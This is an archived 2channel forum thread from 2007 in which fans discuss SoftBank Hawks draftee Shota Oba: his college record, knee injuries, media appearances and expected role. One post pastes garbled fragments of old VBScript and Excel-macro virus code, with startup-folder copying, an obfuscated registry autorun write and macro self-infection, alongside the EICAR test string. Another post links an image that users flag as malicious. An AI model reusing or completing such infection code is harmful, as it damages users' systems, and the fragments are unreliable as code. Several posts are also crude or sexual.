5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【稲尾2世?】SB大場翔太【大場1世じゃ!】

1 :代打名無し@実況は実況板で:2007/11/19(月) 20:50:06 ID:949SfpGO0
どうぞ!

2 :代打名無し@実況は実況板で:2007/11/19(月) 20:50:49 ID:82Ge25jy0
あえてスレタイのセンスは問わないでおく

3 :代打名無し@実況は実況板で:2007/11/19(月) 20:52:00 ID:IvN0mPHb0
>>1
糞スレ立てんな氏ね

4 :代打名無し@実況は実況板で:2007/11/19(月) 20:52:52 ID:7H8lUBsvO
岩嵜といいスレタイのセンスがw
せめて平成の鉄腕ぐらいにしてほしかった

5 :代打名無し@実況は実況板で:2007/11/19(月) 20:52:55 ID:iH0ji5wb0
今日立てても荒れるだけ

6 :代打名無し@実況は実況板で:2007/11/19(月) 20:54:33 ID:949SfpGO0
1時間かけて考えたスレタイなのに

7 :代打名無し@実況は実況板で:2007/11/19(月) 20:56:06 ID:ClqvgJFN0
まあいいよ

松田の最初のスレなんて(ry

8 :代打名無し@実況は実況板で:2007/11/19(月) 20:58:01 ID:WC9s1Ouo0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

9 :代打名無し@実況は実況板で:2007/11/19(月) 21:00:19 ID:aKia/AkbO
>>スレタイ之扇子無左杉

10 :代打名無し@実況は実況板で:2007/11/19(月) 21:03:12 ID:LqN1UkWcO
【若鷹】☆★☆大場翔太☆★☆【鉄腕】part1


↑これがよかった

11 :代打名無し@実況は実況板で:2007/11/19(月) 21:07:21 ID:mgKFubRs0
このスレタイでも全然気にならんよ
ケチつけたがるヤツ多いな

12 :代打名無し@実況は実況板で:2007/11/19(月) 21:09:39 ID:U5kuYG4cO
俺も割と好きだよ
新人はこれくらい強気でいいかも
大場一世 なってくれ!

とりあえず今日はプロ野球ニュースはしごw

13 :代打名無し@実況は実況板で:2007/11/19(月) 21:12:09 ID:949SfpGO0
ありがたい

14 :代打名無し@実況は実況板で:2007/11/19(月) 21:13:45 ID:zmZggA3gO
神様、仏様、大場様…って言われる投手になれ(^o^)

15 :代打名無し@実況は実況板で:2007/11/19(月) 21:14:10 ID:N87cxwqyO
事前に会ってたのね

16 :代打名無し@実況は実況板で:2007/11/19(月) 21:16:05 ID:X3VOyGBk0
頑張って鉄腕を襲名せんとな

17 :代打名無し@実況は実況板で:2007/11/19(月) 21:17:37 ID:sii62qEa0
投げてるの見た感じ、なんか肘を故障しそうだなーって思ったが、
年間200イニング以上も投げてるなら大丈夫だな!!

18 :代打名無し@実況は実況板で:2007/11/19(月) 21:18:39 ID:CDxfmgE6O
やっと王が2007年で仕事したな

19 :代打名無し@実況は実況板で:2007/11/19(月) 21:31:51 ID:yK5uwxH60
>>17
いやいや、大学リーグで投げすぎてプロ入った途端に
故障、なんていう選手はちょくちょくいますよ。

でも大場はそうであって欲しくないな。

20 :代打名無し@実況は実況板で:2007/11/19(月) 21:33:53 ID:6izLJNHkO
元近鉄、小池の再来にならぬ様に。

21 :レッズ:2007/11/19(月) 21:42:00 ID:y5vRjLANO
ソフトバンクに恨みはないが大場はセパBクラスのチームでローテに入ってほしかった
その方が野球界の為じゃないか?

22 :代打名無し@実況は実況板で:2007/11/19(月) 21:42:27 ID:aKia/AkbO
>>10次スレはそんな華やかな感じにしようぜ!!

23 :代打名無し@実況は実況板で:2007/11/19(月) 21:57:00 ID:R1NEnBTn0
tonikaku
omedetou
dayonna.


24 :代打名無し@実況は実況板で:2007/11/19(月) 21:58:40 ID:KtU/b5I20
タカの右本格派
若田部,山村,山田,寺原…

25 :代打名無し@実況は実況板で:2007/11/19(月) 22:00:53 ID:7H8lUBsvO
>>22
ガキじゃあるまいし飾り付けに興味を持つなw

26 :代打名無し@実況は実況板で:2007/11/19(月) 23:01:23 ID:P4jMRy0f0
検索せずに見つけやすいってのもある

27 :代打名無し@実況は実況板で:2007/11/19(月) 23:39:43 ID:dy997xjy0
>>26
専ブラ使えばそんなに困らんような気が・・・

28 :代打名無し@実況は実況板で:2007/11/20(火) 00:10:08 ID:Y7fVXC59O
確かに検索はかかりにくいな

ま、大場ガンガレ!

29 :代打名無し@実況は実況板で:2007/11/20(火) 00:18:24 ID:sWzfw0Z60
◆今年の大場◆
春季リーグ戦   88.6回 自責14 奪三振115 防御率1.42
全日本選手権  17.3回 自責*3 奪三振*23 防御率1.56
日米大学野球  11.6回 自責*7 奪三振*13 防御率5.40
プレ五輪大会.  11.0回 自責*2 奪三振*10 防御率1.64
秋季リーグ戦   79.3回 自責11 奪三振101 防御率1.25
神宮野球大会  27.0回 自責*3 奪三振*32 防御率1.00
-------------------------------------------------
合____計   235回 自責40 奪三振294 防御率1.53

プレ五輪チェコ戦の奪三振数が不明だけど、だいたいこんな感じ

30 :代打名無し@実況は実況板で:2007/11/20(火) 01:06:15 ID:mjc7AeGb0
ああ。。。

嬉しくて眠れないよw
ウェルカム大場くん!

31 :代打名無し@実況は実況板で:2007/11/20(火) 09:28:13 ID:Oi5Oa94KO
大田阿斗里?

32 :代打名無し@実況は実況板で:2007/11/20(火) 09:45:35 ID:3FPrGVs/O
クジ当てたらコメットさんのボード作って応援しようと思ったのに…
しゃーない。福岡で頑張れ

33 :代打名無し@実況は実況板で:2007/11/20(火) 10:02:36 ID:cxzwwbCJO
なにこの加齢臭ただようスレタイのセンス

34 :代打名無し@実況は実況板で:2007/11/20(火) 10:05:50 ID:0AD5Q0VgO
>>33
だよな。まあ次スレはまだ10代でセンスのある俺が華やかな感じのやつ建ててやるから安心しろ

35 :代打名無し@実況は実況板で:2007/11/20(火) 10:06:46 ID:vKi0UsCC0
寝言は西スポの記事読んでから言え>>33-34

36 :代打名無し@実況は実況板で:2007/11/20(火) 10:13:57 ID:oaWvIro3O
他球団ファンですが、斎藤和巳ファンでもある
自分からしたら和巳が二人になったみたいで
うらやましいです。
ただちょっと過大評価気味な気がしないでもない

37 :代打名無し@実況は実況板で:2007/11/20(火) 10:32:30 ID:+8wDt1Qs0
背番号は11か17のどっちがだろうね


38 :代打名無し@実況は実況板で:2007/11/20(火) 10:45:15 ID:q1a3GtRQO
>>6をかわいいと思ってしまった俺はTDN2世?

39 :名無しさん@実況は実況板で:2007/11/20(火) 10:48:42 ID:0P2+Owpu0
大場は大学1年の頃、雑誌のインタでで尊敬しているのは
高校の先輩の多田野さんと言っていた

その二人が同じ年に1順目指名されて八千代OBとしては非常に嬉しい

40 :代打名無し@実況は実況板で:2007/11/20(火) 10:49:59 ID:mDKi1D2IO
久保田2世やな

41 :代打名無し@実況は実況板で:2007/11/20(火) 10:52:55 ID:xRVbBe5aO
そういえば江夏2世は………


いや…なんでもない…

42 :代打名無し@実況は実況板で:2007/11/20(火) 10:53:39 ID:vKi0UsCC0
王監督 大場に“鉄腕”継承期待
ttp://www.sponichi.co.jp/baseball/news/2007/11/20/01.html

43 :代打名無し@実況は実況板で:2007/11/20(火) 10:58:38 ID:K2vwdef20
大場は転んだだけで全治2年以上の大ケガをしちゃうし(それも両膝)
視力が悪くてコンタクト使用してるみたいだし、ひ弱なのかな?
プロで活躍するには肉体改造と視力回復は重要かもね。

大場はトラウマで世界陸上や北京五輪の100m障害(ハードル)などは
怖くて絶対に観ることは出来ないだろう。半月板損傷さえなければ
大場の実力からして、野球推薦(特待生)でもっと名門の高校へ入学
甲子園出場、大学も選り取り見取りで好きなチームへ行けただろう。

44 :代打名無し@実況は実況板で:2007/11/20(火) 11:05:41 ID:ETJRl8vs0
山田が27になって
大場が17かも

45 :代打名無し@実況は実況板で:2007/11/20(火) 11:06:29 ID:eOt1qJXs0
>>43
くやしいのうwwwwwwwwwwくやしいのうwwwwwwwwwwwww
大場が獲れなくてくやしいのうwwwwwwwwwwwwwwww

46 :代打名無し@実況は実況板で:2007/11/20(火) 11:18:18 ID:dzkYrO4c0
くやじいいいい。おおばのおおばかあああ。

47 :代打名無し@実況は実況板で:2007/11/20(火) 11:23:37 ID:vKi0UsCC0
>>46
梨駄さんはTDN獲ったからいいじゃないですか

48 :代打名無し@実況は実況板で:2007/11/20(火) 11:23:48 ID:0PboUOr4O
大場には11番をつけてほしいなぁ。川上やダルみたいなエース級に育ってほしい。

49 :代打名無し@実況は実況板で:2007/11/20(火) 11:24:27 ID:bqMHPKeaO
一場みたくならなきゃいいが…

50 :代打名無し@実況は実況板で:2007/11/20(火) 11:31:55 ID:RkXBIYTB0
一場と大隣を合わせたような選手にならなければよいが・・・・

51 :代打名無し@実況は実況板で:2007/11/20(火) 11:40:56 ID:iLjKfvzj0
一場は調子良い時は、どんな球団でも手がつけられん程の投手だが
ちゃんとパ・リーグ見てますか?

52 :代打名無し@実況は実況板で:2007/11/20(火) 12:05:49 ID:G7tpPjlZ0
       ヽ|/
     / ̄ ̄ ̄`ヽ、
    /  大場    ヽ
   /  \,, ,,/    |
   | (●) (●)|||  |
   |  / ̄⌒ ̄ヽ U.|   <オリックスに当てられるリアルな夢見た・・・・
   |  | .l~ ̄~ヽ |   |
   |U ヽ  ̄~ ̄ ノ   |
   |    ̄ ̄ ̄    |


53 :代打名無し@実況は実況板で:2007/11/20(火) 12:09:22 ID:kljN4EXU0
>>50
一隣だったらヤバそうだけどなw

54 :代打名無し@実況は実況板で:2007/11/20(火) 12:46:28 ID:WswW2pk70
稲尾2世って稲尾はライオンズでしょ。ホークスなら杉浦2世が適当かと・・・・

まあ投球フォームは稲尾だけど・・・・。

55 :代打名無し@実況は実況板で:2007/11/20(火) 12:49:42 ID:kljN4EXU0
福岡つながりで稲尾なんでしょ。
あと、大場は連投がきくから「鉄腕」の後継者と言われる所以。
活躍した大会中に稲尾が亡くなったのもあるしね。

56 :代打名無し@実況は実況板で:2007/11/20(火) 12:50:59 ID:CTQmUh3y0
大場はひ弱だ。普通、ハードルなんかで転ぶか?
転んだだけで半月板損傷の大手術なんか受けるか?
コンタクトなしでは生活出来ないのは、都会育ちの偏食だからだろ?

57 :代打名無し@実況は実況板で:2007/11/20(火) 12:51:44 ID:+/f0fg7OO
>>51
一場は調子いい時が少なすぎるだろ・・・

たまに凄いピッチングするより安定して7回2、3失点で抑えるピッチャーの方が使いやすいと思われる

58 :代打名無し@実況は実況板で:2007/11/20(火) 13:24:01 ID:tx86tV5J0
スレタイみて亀田みたいな性格なのかと

59 :代打名無し@実況は実況板で:2007/11/20(火) 16:14:13 ID:njY2eNPM0
≪仲良し・大場を祝福≫多田野が千葉・八千代松陰の後輩で、ソフトバンクが
1巡目に指名して交渉権を獲得した大場に連絡を入れて祝福。
大場より5歳年上で普段から食事に出かけたりするなど親交が深く、
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
お互いに「おめでとう。頑張ろう」と言い合って喜んだ。多田野がエースとして
出場した98年夏の甲子園の活躍を見て、大場が同校への進学を決めた

60 :代打名無し@実況は実況板で:2007/11/20(火) 16:17:00 ID:3I6Yiv2K0
大場って目にはコンタクト、ユニの下は疲労で肩や股関節にテーピング
両膝は転んだ時の傷跡と、満身創痍って感じ。見た目も細いしね。

61 :代打名無し@実況は実況板で:2007/11/20(火) 17:10:14 ID:zuql5ync0

ミスター完投の大場

大学通算33勝11敗

22完投21完投勝利

東都リーグ奪三振記録保持者

MAX151km/s


62 :代打名無し@実況は実況板で:2007/11/20(火) 17:18:50 ID:K1bOE4NeO
おおばけする!
なんちてw

63 :代打名無し@実況は実況板で:2007/11/20(火) 18:29:08 ID:rD7rX7S0O
投手層の薄い球団が理想だったか
一年目からどんどん使ってくれ!

64 :代打名無し@実況は実況板で:2007/11/20(火) 18:55:39 ID:kkA80XfH0
愛してるぜ大場!

65 :代打名無し@実況は実況板で:2007/11/20(火) 20:18:16 ID:IWvnPzKM0
ttp://www.zakzak.co.jp/spo/2007_11/s2007112008_all.html

楽天に行きたかったんだね、まあこれも運命だと思って頑張れ
手始めに、田舎大学リーグ出身の岸はサクっと超えてくれwww

66 :代打名無し@実況は実況板で:2007/11/20(火) 20:22:34 ID:1mEEjg6u0
まあ、あれだ
チャンスをものにすればローテも見えてくる

67 :代打名無し@実況は実況板で:2007/11/20(火) 20:23:56 ID:OPdDDJ9E0
ソースがzakzakの時点で…

68 :代打名無し@実況は実況板で:2007/11/20(火) 20:25:40 ID:nQhZR+Ym0
ようやく60年生まれ以降の本格派若手が入ってきたな。
ウチにも公のダル、ロッテ成瀬、西武涌井、楽天マー坊と
将来にわたってタイトル争いをはりあえる若手が入ってきて本当に楽しみだ。



オリックス?彼らがキャリアハイの頃には消滅してるでしょ。

69 :代打名無し@実況は実況板で:2007/11/20(火) 20:28:28 ID:IWvnPzKM0
俺の大引が居る限り消滅などせんっ!!!!123

70 :代打名無し@実況は実況板で:2007/11/20(火) 21:13:03 ID:eNMJzPvK0
>>65
なんか寺原と真田の時のやりとりを思い出すのは俺だけ?

71 :代打名無し@実況は実況板で:2007/11/20(火) 22:00:16 ID:9tM0nSLW0
稲尾2世なら背番号24番

72 :代打名無し@実況は実況板で:2007/11/21(水) 00:08:45 ID:iyUycHm10
稲尾二世!と王さんが言った時点で日シリでの三連投の運命はきまりました。

73 :代打名無し@実況は実況板で:2007/11/21(水) 01:28:33 ID:ljjPAmeU0
スレタイはセンスないなぁW

74 :代打名無し@実況は実況板で:2007/11/21(水) 07:42:06 ID:u6A5kgMU0
既に
神宮大会の連投で壊れてるょ

75 :代打名無し@実況は実況板で:2007/11/21(水) 13:17:28 ID:SE0tmpLn0
>>74
願望乙

76 :代打名無し@実況は実況板で:2007/11/21(水) 14:44:19 ID:3LPXz/gR0
大場が手術したってマジなのかね?

77 :代打名無し@実況は実況板で:2007/11/21(水) 14:45:44 ID:mYIof8Ii0
>>76
ガセ

78 :代打名無し@実況は実況板で:2007/11/21(水) 14:58:52 ID:LRBfgiRkO
過度な期待はすんなよ。頑張ってほしいけど、1年目から13勝するようなPではない。

79 :代打名無し@実況は実況板で:2007/11/21(水) 15:01:49 ID:gYscbmsi0
>>71 高橋徹は?


80 :代打名無し@実況は実況板で:2007/11/21(水) 15:19:42 ID:3LPXz/gR0
>>77
半月板がどうこう書いてあったが・・・

81 :代打名無し@実況は実況板で:2007/11/21(水) 15:37:07 ID:mYIof8Ii0
>>80
中2の体育の授業中、ハードルにつまずいての右ひざ半月板損傷のこと?
進学直前の3月に手術を受けるまで、治療どころか検査も受けず野球を続けてたらしいからたいしたことは無いよ。

82 :代打名無し@実況は実況板で:2007/11/21(水) 18:09:59 ID:8DkNpk2L0
大場の傷跡って近くで見たらグロテスクだろうね。
まあ、そこまで痛い思いして乗り越えた分、今の大場があるんだろう。
綺麗な体を保とうなんて思うなら、スポーツなんか出来ないしね。
死ぬほど痛い思いした大場だからこそ、人の痛みも分かるんだろう。
行き詰った時は、くっきりと残った傷跡を見て、乗り越えろ、大場!


83 :代打名無し@実況は実況板で:2007/11/21(水) 19:34:29 ID:Y4iUXn/l0
このスレタイで一生いこうお;;

84 :代打名無し@実況は実況板で:2007/11/21(水) 21:05:56 ID:3LPXz/gR0
>>81
そこまで大したことないケガなら、でも何で手術したんだろうね?

85 :代打名無し@実況は実況板で:2007/11/22(木) 00:18:49 ID:1H9WX8ui0
大場のどこが頑丈なのか意味不明。ハードルで転ぶなんてダサいし
それくらいで半月板損傷の大ケガ、手術なんてしてたら
体がいくつあっても足りないね。右膝は切開手術、左も内視鏡手術したらしいよ。
通常なら2〜3ヶ月で完治、競技復帰出来るケガだが
大場は術後の回復が遅れ、松葉杖も付いていたし、高1の時は練習出来なかった。

86 :代打名無し@実況は実況板で:2007/11/22(木) 02:39:26 ID:Gb59Gzsf0
大場の新人入団会見どうなるん?

87 :代打名無し@実況は実況板で:2007/11/22(木) 04:24:35 ID:5OAix/OgO
どうなるも何も普通だろ
何か問題でも起こったっけ?

88 :代打名無し@実況は実況板で:2007/11/22(木) 07:49:06 ID:DYB/HqhQ0
>>87
東洋大が優勝のご褒美で台湾遠征に出る。
ところが仮契約を結んでいると規定により参加できない。
しかし入団会見は仮契約を結ばないとできない。

たぶん入団会見の日にちをずらすことになるんじゃないかな


89 :代打名無し@実況は実況板で:2007/11/22(木) 09:44:47 ID:dIb22NnL0
台湾遠征で故障や病気をしないことを切に願います

90 :代打名無し@実況は実況板で:2007/11/22(木) 20:48:55 ID:1H9WX8ui0
>>89
ハードルがなければ大丈夫。

91 :代打名無し@実況は実況板で:2007/11/22(木) 20:58:29 ID:dwzrVt9G0
出身校が卒業生のホモビデオ出演をネタと隠蔽!!

【強いな】成田高校part3【おめでとう】
http://ex20.2ch.net/test/read.cgi/hsb/1194355452/l50

92 :代打名無し@実況は実況板で:2007/11/22(木) 23:25:34 ID:6+SmlzY50
>>6を読んで勃起しました

93 :代打名無し@実況は実況板で:2007/11/23(金) 00:13:10 ID:v8kVEl910
早くも背番号6の人と同類扱いか?w

94 :代打名無し@実況は実況板で:2007/11/23(金) 11:23:28 ID:mOCPeZN+0
大場の期待にあげ

95 :代打名無し@実況は実況板で:2007/11/23(金) 12:08:19 ID:P0YDMBzT0
なんで投手戦国のパリーグなんだよ
長谷部もパリーグだし、パリーグの投手レベルはやばすぎるぐらい高いなw
逆にセリーグは楽天以下の広島といい、ろくな若手がいないロートル投手ばかりでレベルが低すぎる
セリーグにいけばよかったのにな

96 :代打名無し@実況は実況板で:2007/11/23(金) 12:22:14 ID:eHie6PEb0
大隣2世か山田2世でいいよ

97 :代打名無し@実況は実況板で:2007/11/23(金) 12:23:00 ID:vd7pjSTU0
投手戦国・・・

98 :代打名無し@実況は実況板で:2007/11/23(金) 12:58:19 ID:P0YDMBzT0
パリーグが大リーグだとするとセリーグは3Aぐらい差がある

99 :代打名無し@実況は実況板で:2007/11/23(金) 13:15:49 ID:FbYFcy260
あぷぷくんにそれ言ってみろ。

100 :代打名無し@実況は実況板で:2007/11/23(金) 13:18:34 ID:+ojS999I0
あのキチガイに言ったらどうなるかねぇw

101 :代打名無し@実況は実況板で:2007/11/23(金) 13:24:24 ID:bn86hBO10
ニートあぷぷwwwwwww

102 :代打名無し@実況は実況板で:2007/11/23(金) 13:29:33 ID:dKAof+MD0
 2008年 大場
11勝7敗 防御率 3.27 新人王 5完投
 2008年 大隣
13勝7敗 防御率 3.11 2完封 

103 :代打名無し@実況は実況板で:2007/11/23(金) 13:38:35 ID:5yp/vggY0
ホークスには、いい捕手がいないからなぁ。
今活躍してる投手はみんな城島がいた頃に完成した人たちだからね。

104 :代打名無し@実況は実況板で:2007/11/23(金) 16:16:31 ID:tqiq5bxE0
2008
大場 13勝6敗 3.12
大隣 11勝5敗 3.34

105 :代打名無し@実況は実況板で:2007/11/23(金) 21:42:58 ID:QEypG4X80
http://jp.youtube.com/watch?v=9DQJFlUo2MM

106 :代打名無し@実況は実況板で:2007/11/24(土) 02:01:43 ID:bFCe2Mj40
ソフトバンクは投手陣凄すぎだよ
トレードした寺原だってセリーグでは横浜のエースになっちゃうぐらい凄いのに
大場はきついところに来たな しかも打線はへぼ

107 :代打名無し@実況は実況板で:2007/11/24(土) 02:30:50 ID:9Cwj/hpxO
>>104
それ実現しないかなぁ・・・
大隣はフルでやれたら可能性高いけど
大場は馬原程度で終わって2年目開花のような気がする

108 :代打名無し@実況は実況板で:2007/11/24(土) 08:20:22 ID:8D0vKb9VO
大場君のお尻を見てオナニーしてみたいんだけど画像ない?

109 :代打名無し@実況は実況板で:2007/11/24(土) 10:41:44 ID:bDZZoVqt0
テレビ生出演来るよ!!

110 :代打名無し@実況は実況板で:2007/11/24(土) 11:32:14 ID:WFlsomeBO
あぁ見逃した。福岡の番組だよな。
連休だから福岡にきてるのか。
なんか話した?
私服だったの?

111 :代打名無し@実況は実況板で:2007/11/24(土) 11:34:28 ID:B5eDVI6W0
>>110
東洋大の制服でした。

112 :代打名無し@実況は実況板で:2007/11/24(土) 11:35:41 ID:xNhrOj090
>>110
TNCのCUBEっていう番組
鷹スレにまとめてくれてるよ

113 :代打名無し@実況は実況板で:2007/11/24(土) 13:19:20 ID:WFlsomeBO
最後だけ見たが共演者がみんな素朴でかわいいって言ってたな。

大場ってなんかホークス斎藤に似てないか?

114 :代打名無し@実況は実況板で:2007/11/24(土) 15:10:14 ID:n+OXotGj0
しくった

115 :代打名無し@実況は実況板で:2007/11/24(土) 15:15:43 ID:n+OXotGj0
しくった

116 :代打名無し@実況は実況板で:2007/11/24(土) 17:02:48 ID:n+OXotGj0
大場まだ?

117 :代打名無し@実況は実況板で:2007/11/24(土) 17:18:29 ID:GY09qFZa0
まだ スーパーニュースは5時半から



118 :代打名無し@実況は実況板で:2007/11/24(土) 17:28:57 ID:n+OXotGj0
くるー?

119 :代打名無し@実況は実況板で:2007/11/24(土) 17:30:23 ID:GY09qFZa0
ありゃ全国ニュースじゃんw

120 :代打名無し@実況は実況板で:2007/11/24(土) 17:35:10 ID:n+OXotGj0
でる気配がないんだが

121 :代打名無し@実況は実況板で:2007/11/24(土) 17:52:22 ID:yrNMV4S40
6時半からテレQでやる番組じゃないのか?

122 :代打名無し@実況は実況板で:2007/11/24(土) 18:06:00 ID:n+OXotGj0
生か?

123 :代打名無し@実況は実況板で:2007/11/24(土) 18:06:58 ID:GY09qFZa0
でも新聞には出演とは書いてないぞ

124 :代打名無し@実況は実況板で:2007/11/24(土) 18:08:54 ID:50lN22G8O
大場投手が投げる変化球って何がありますか?

125 :代打名無し@実況は実況板で:2007/11/24(土) 18:18:30 ID:g1AXEgVA0
>>124
スライダーとカーブだっけ?

126 :代打名無し@実況は実況板で:2007/11/24(土) 18:27:35 ID:n+OXotGj0
>>124
横縦スライダーとフォークが主?

127 :代打名無し@実況は実況板で:2007/11/24(土) 18:37:08 ID:KK3mMsLfO
>>95
セリーグにいたら普通に炎上する
パはやまいですら完封できるぬるさだから投手には天国

128 :代打名無し@実況は実況板で:2007/11/24(土) 18:37:23 ID:n+OXotGj0
大場くるうううううううううう


129 :代打名無し@実況は実況板で:2007/11/24(土) 20:29:30 ID:1R4HniPC0
>>124
ストレート  142〜150km/h
スライダー  125〜133km/h
ツーシーム 135〜140km/h
カーブ    115〜120km/h
フォーク   130〜135km/h
球速は自己申告。ソースは野球小僧

130 :代打名無し@実況は実況板で:2007/11/24(土) 21:11:52 ID:WFlsomeBO
みんな大場が見れなかったからってそんなオーバーに凹むなよ

131 :代打名無し@実況は実況板で:2007/11/24(土) 21:36:45 ID:YK3+kgxJ0
>>130
この大馬鹿者

132 :代打名無し@実況は実況板で:2007/11/24(土) 21:48:57 ID:OsWKg+i40
[ー。ー]<おかしい、このスレから川相さんの匂いがする…

133 :代打名無し@実況は実況板で:2007/11/25(日) 00:16:57 ID:pfQ0fsni0
うるぐすGJすぎるわ

134 :代打名無し@実況は実況板で:2007/11/25(日) 00:17:16 ID:yLiX/rPHO
うるぐすきたぞー

135 :代打名無し@実況は実況板で:2007/11/25(日) 00:18:29 ID:pfQ0fsni0
メジャーなんかきくな!生涯ホークスや!

136 :代打名無し@実況は実況板で:2007/11/25(日) 00:21:51 ID:ZYCo3Cyo0
やっぱり大学生だから一応勉強するんだね。

137 :代打名無し@実況は実況板で:2007/11/25(日) 00:25:33 ID:tD0A8tRKO
スレタイがいい

138 :代打名無し@実況は実況板で:2007/11/25(日) 00:26:48 ID:c9LgVf9O0
日テレは大場が初対面の斎藤に近づき
いきなり尻ポケットに手を入れてハンカチ探した映像をもってるくせに
なぜ流さないんだ
もう一回見たいんだよ、あれ

139 :代打名無し@実況は実況板で:2007/11/25(日) 00:27:51 ID:dFw3BtmS0
江川がマーくんより活躍できるって言ってた。

140 :代打名無し@実況は実況板で:2007/11/25(日) 00:28:59 ID:c9LgVf9O0
誰も松坂より勝てるとは言ってくれないね

141 :代打名無し@実況は実況板で:2007/11/25(日) 00:31:27 ID:ZHfWLPfR0
残すはあと4単位って、通年1コマかセメスタ−2コマか、いずれにしても優秀じゃん。
謙虚でいい感じだね。
応援するよ。

142 :代打名無し@実況は実況板で:2007/11/25(日) 00:34:44 ID:bUubuLoe0
>138
なんとなく見た事あるような…あれが大場でホークスに来るとは思ってなかったなぁ
てか大場素朴な感じだな。東京の人なのに

143 :代打名無し@実況は実況板で:2007/11/25(日) 00:38:41 ID:pfQ0fsni0
去年白仁田取れれば御の字と思っていたが、嬉しいよな。

144 :代打名無し@実況は実況板で:2007/11/25(日) 00:40:21 ID:C99Zy++l0
>投稿者 八千代 : 2007年06月17日 21:27

>大場はすごいやつになりました。
>高校の入学式のあいつの言葉を思い出します。
>「勉強のあいまにバットふるんじゃねーよ、バットふる間に疲れたら勉強して
>休むんだろ!!」と野球部のやつにどなってました。
>そんな野球馬鹿だからここまでこれたんだと思います。頑張れ大場!!

145 :代打名無し@実況は実況板で:2007/11/25(日) 00:41:15 ID:uHK1ZowN0
>>103
ジョーが金の卵の投手達をうま〜く孵化させたんだよね。

146 :代打名無し@実況は実況板で:2007/11/25(日) 00:51:20 ID:pfQ0fsni0
>>144
どういう意味だ・・・?

147 :代打名無し@実況は実況板で:2007/11/25(日) 00:54:05 ID:vOvMt9M70
http://anu.s7.x-beat.com/1up/src/up11316.jpg

148 :代打名無し@実況は実況板で:2007/11/25(日) 00:57:42 ID:AzTw73nK0
大場かっこいい!
東都の実力見せてやれ!!

149 :代打名無し@実況は実況板で:2007/11/25(日) 01:03:37 ID:pfQ0fsni0
>>147
俺の大場のスレになんてものを!

150 :代打名無し@実況は実況板で:2007/11/25(日) 01:04:42 ID:AM8vQcrqO
見逃した…ショック

151 :代打名無し@実況は実況板で:2007/11/25(日) 01:23:35 ID:C99Zy++l0
>>147
ブラクラ

152 :代打名無し@実況は実況板で:2007/11/25(日) 01:33:08 ID:f/BwMuZ40
>>138
http://jp.youtube.com/watch?v=RPwFIQPXDYM

これで見られるよ。

153 :代打名無し@実況は実況板で:2007/11/25(日) 01:36:29 ID:f/BwMuZ40
>>147は開けない方がいいかも。ウイルスっぽい。

日米候補合宿(平塚)はUPしたから、誰か今日の大場の画像ない?
うるぐす見逃したし、神奈川在住だから福岡の番組は見られないし・・・
今は福岡滞在なのかな?それとも、帰京して日テレ出たの?

154 :代打名無し@実況は実況板で:2007/11/25(日) 01:48:01 ID:pfQ0fsni0
>>152
サンクス。2:34 から大場きたな
人懐っこい大場は早く馴染めそうだな。

155 :代打名無し@実況は実況板で:2007/11/25(日) 01:52:04 ID:1EQ53BEn0
大場の背番号は稲尾さんの意思を継いで24にして欲しい



156 :代打名無し@実況は実況板で:2007/11/25(日) 02:56:31 ID:yLiX/rPHO
いつから台湾なの?


157 :代打名無し@実況は実況板で:2007/11/25(日) 03:04:26 ID:f/BwMuZ40
>>156
12/11〜18

158 :代打名無し@実況は実況板で:2007/11/25(日) 04:11:44 ID:yLiX/rPHO
d。
ダルや田中、ついでに多田野と投げ合い見れるのは嬉しいな。


159 :代打名無し@実況は実況板で:2007/11/25(日) 07:40:11 ID:4yoU1EI60
うるぐす見てなかったorz
どんな内容でしたか?

160 :代打名無し@実況は実況板で:2007/11/25(日) 10:45:46 ID:JktJOjRbO
うるぐすに出るなんて新聞に書いてなかったよね。ずるいよ日テレ。

161 :代打名無し@実況は実況板で:2007/11/25(日) 11:23:06 ID:yLiX/rPHO
うるぐすただ大学の野球部の寮の映像流れただけ。

162 :代打名無し@実況は実況板で:2007/11/25(日) 15:16:15 ID:pfQ0fsni0
俺の大場は永遠に不滅です

163 :代打名無し@実況は実況板で:2007/11/25(日) 17:27:13 ID:/ayWruuX0
表紙に見とれて週ベを久しぶりに買ってしまった

164 :代打名無し@実況は実況板で:2007/11/25(日) 20:39:11 ID:ylBkTk820
寝坊して慌てる大場
http://photos.nikkansports.com/baseball/professional/hawks/hawks/20071125-51132.html


165 :代打名無し@実況は実況板で:2007/11/25(日) 20:42:55 ID:ylBkTk820
ヤフードームを指さす大場
http://photos.nikkansports.com/baseball/professional/hawks/hawks/20071124-51073.html

166 :代打名無し@実況は実況板で:2007/11/25(日) 22:49:50 ID:er/xdpez0
>>164
寝坊しても飛行機には間に合ったんだな
てかネクタイくらい飛行機の中で締められるだろw

167 :代打名無し@実況は実況板で:2007/11/25(日) 23:34:03 ID:f/BwMuZ40
大場はコンタクトだから、寝不足の目にコンタクト入れるのは
大変だと思うし、時間的ロスもあるね。メガネでもいいと思うんだけどね。
でも、疲労困憊なのに、大場、良い表情してるね。

168 :代打名無し@実況は実況板で:2007/11/25(日) 23:41:18 ID:yLiX/rPHO
大場がローテいりしたら落ちるのは大隣か新垣かな?
新垣は暴投で安定しないし、大隣は怪我だらけでキャンプから返されるし。


169 :代打名無し@実況は実況板で:2007/11/25(日) 23:47:36 ID:U1qTYMKM0
